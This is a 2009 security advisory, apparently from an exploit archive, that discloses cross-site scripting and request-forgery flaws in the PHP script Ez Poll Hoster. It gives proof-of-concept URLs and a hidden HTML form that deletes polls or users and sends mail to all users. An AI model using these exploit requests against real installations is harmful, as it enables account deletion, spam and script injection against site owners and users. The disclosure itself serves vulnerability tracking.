Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities

2009.12.25
Credit: Milos Zivanovic
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-4384 | CVE-2009-4385
CWE: CWE-79
CWE-352

[#-----------------------------------------------------------------------------------------------#] [#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities [#] Author: Milos Zivanovic [#] Email: milosz.security[at]gmail.com [#] Date: 14. December 2009. [#-----------------------------------------------------------------------------------------------#] [#] Application: Ez Poll Hoster [#] Version: the only one there is [#] Platform: PHP [#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206 [#] Price: 15 USD [#] Vulnerability: Multiple XSS and XSRF Vulnerabilities [#-----------------------------------------------------------------------------------------------#] [#]Content |--User panel | |--XSS in user panel | |--Delete poll by name | |--Admin panel |--XSS in admin panel |--Delete user by name |--Email all users [#]User panel [-]XSS in user panel [POC----------------------------------------------------------------------------------------------] http://localhost/eph/index.php?action=code&pid=[XSS] [POC----------------------------------------------------------------------------------------------] [-]Delete poll by name [POC----------------------------------------------------------------------------------------------] http://localhost/eph/index.php?action=delete_poll&pid=[POLL NAME]&do=true&is_js_confirmed=1 [POC----------------------------------------------------------------------------------------------] [#]Admin panel [-]XSS in admin panel [POC----------------------------------------------------------------------------------------------] http://localhost/eph/profile.php?action=view&uid=[XSS] [POC----------------------------------------------------------------------------------------------] [-]Delete user by name [POC----------------------------------------------------------------------------------------------] http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER NAME]&is_js_confirmed=1 [POC----------------------------------------------------------------------------------------------] [-]Email all users [EXPLOIT------------------------------------------------------------------------------------------] <form action="http://localhost/eph/admin.php?action=email&do=true" method="post"> <input type="hidden" name="subject" value="this is my subject"> <input type="hidden" name="message" value="this is my message"> <input type="submit" name="submit" value="Submit"> </form> [EXPLOIT------------------------------------------------------------------------------------------] [#] EOF

References:

http://www.vupen.com/english/advisories/2009/3529
http://www.exploit-db.com/exploits/10439
http://secunia.com/advisories/37716
http://packetstormsecurity.org/0912-exploits/ezpollhoster-xssxsrf.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top